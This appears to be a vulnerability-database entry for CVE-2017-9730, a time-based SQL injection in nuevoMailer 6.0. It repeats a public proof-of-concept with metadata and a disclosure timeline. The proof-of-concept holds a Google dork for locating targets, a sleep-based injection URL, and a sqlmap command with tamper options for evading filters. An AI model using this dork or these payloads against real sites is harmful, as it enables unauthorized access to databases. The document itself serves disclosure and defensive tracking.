ID 1337DAY-ID-27972 Type zdt Reporter Oleg Boytsev Modified 2017-06-19T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and earlier
# Tested on: Linux
# CVE: CVE-2017-9730
Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4
NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
Disclosure Timeline:
2017-06-09: Vendor has been notified
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-16: CVE number acquired
2017-06-16: Public disclosure
# 0day.today [2018-04-09] #
{"sourceData": "# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection\r\n# Exploit Author: ALEH BOITSAU\r\n# Google Dork: inurl:/inc/rdr.php?\r\n# Date: 2017-06-09\r\n# Vendor Homepage: https://www.nuevomailer.com/\r\n# Version: 6.0 and earlier\r\n# Tested on: Linux\r\n# CVE: CVE-2017-9730\r\n \r\nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \r\nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \r\n \r\nPoC:\r\n \r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]\r\n \r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+\r\n \r\nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4\r\n \r\nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time.\r\n \r\nDisclosure Timeline:\r\n2017-06-09: Vendor has been notified\r\n2017-06-09: Vendor responded with intention to fix the vulnerability\r\n2017-06-16: CVE number acquired\r\n2017-06-16: Public disclosure\n\n# 0day.today [2018-04-09] #", "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/27972", "reporter": "Oleg Boytsev", "href": "https://0day.today/exploit/description/27972", "type": "zdt", "viewCount": 8, "references": [], "lastseen": "2018-04-10T00:23:28", "published": "2017-06-19T00:00:00", "cvelist": ["CVE-2017-9730"], "id": "1337DAY-ID-27972", "modified": "2017-06-19T00:00:00", "title": "nuevoMailer 6.0 - SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-04-10T00:23:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-9730"]}, {"type": "exploitdb", "idList": ["EDB-ID:42193"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2B2B3531D4BE8CBDAC48C92BA0AD2474"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142979"]}], "modified": "2018-04-10T00:23:28", "rev": 2}, "vulnersScore": 6.2}}
{"cve": [{"lastseen": "2021-02-02T06:36:52", "description": "SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the \"r\" parameter.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-06-19T12:29:00", "title": "CVE-2017-9730", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9730"], "modified": "2020-05-22T13:36:00", "cpe": ["cpe:/a:dfsol:nuevomailer:6.0"], "id": "CVE-2017-9730", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:dfsol:nuevomailer:6.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2017-06-19T12:14:48", "description": "nuevoMailer 6.0 - SQL Injection. CVE-2017-9730. Webapps exploit for PHP platform", "published": "2017-06-09T00:00:00", "type": "exploitdb", "title": "nuevoMailer 6.0 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9730"], "modified": "2017-06-09T00:00:00", "id": "EDB-ID:42193", "href": "https://www.exploit-db.com/exploits/42193/", "sourceData": "# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection\r\n# Exploit Author: ALEH BOITSAU\r\n# Google Dork: inurl:/inc/rdr.php?\r\n# Date: 2017-06-09\r\n# Vendor Homepage: https://www.nuevomailer.com/\r\n# Version: 6.0 and earlier\r\n# Tested on: Linux\r\n# CVE: CVE-2017-9730\r\n\r\nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \r\nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \r\n\r\nPoC:\r\n\r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]\r\n\r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+\r\n\r\nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between\u00c2\u00a0 --hostname --technique=T -v 3 --random-agent --time-sec=4\r\n\r\nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time.\r\n\r\nDisclosure Timeline:\r\n2017-06-09: Vendor has been notified\r\n2017-06-09: Vendor responded with intention to fix the vulnerability\r\n2017-06-16: CVE number acquired\r\n2017-06-16: Public disclosure", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42193/"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:02", "description": "\nnuevoMailer 6.0 - SQL Injection", "edition": 1, "published": "2017-06-09T00:00:00", "title": "nuevoMailer 6.0 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9730"], "modified": "2017-06-09T00:00:00", "id": "EXPLOITPACK:2B2B3531D4BE8CBDAC48C92BA0AD2474", "href": "", "sourceData": "# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection\n# Exploit Author: ALEH BOITSAU\n# Google Dork: inurl:/inc/rdr.php?\n# Date: 2017-06-09\n# Vendor Homepage: https://www.nuevomailer.com/\n# Version: 6.0 and earlier\n# Tested on: Linux\n# CVE: CVE-2017-9730\n\nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \n\nPoC:\n\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]\n\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+\n\nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between\u00a0 --hostname --technique=T -v 3 --random-agent --time-sec=4\n\nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time.\n\nDisclosure Timeline:\n2017-06-09: Vendor has been notified\n2017-06-09: Vendor responded with intention to fix the vulnerability\n2017-06-16: CVE number acquired\n2017-06-16: Public disclosure", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2017-06-19T20:21:18", "description": "", "published": "2017-06-16T00:00:00", "type": "packetstorm", "title": "nuevoMailer 6.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9730"], "modified": "2017-06-16T00:00:00", "id": "PACKETSTORM:142979", "href": "https://packetstormsecurity.com/files/142979/nuevoMailer-6.0-SQL-Injection.html", "sourceData": "`# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection \n# Exploit Author: ALEH BOITSAU \n# Google Dork: inurl:/inc/rdr.php? \n# Date: 2017-06-09 \n# Vendor Homepage: https://www.nuevomailer.com/ \n# Version: 6.0 and earlier \n# Tested on: Linux \n# CVE: CVE-2017-9730 \n \nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \n \nPoC: \n \nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ] \n \nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+ \n \nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4 \n \nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time. \n \nDisclosure Timeline: \n2017-06-09: Vendor has been notified \n2017-06-09: Vendor responded with intention to fix the vulnerability \n2017-06-16: CVE number acquired \n2017-06-16: Public disclosure \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142979/nuevomailer6-sql.txt"}]}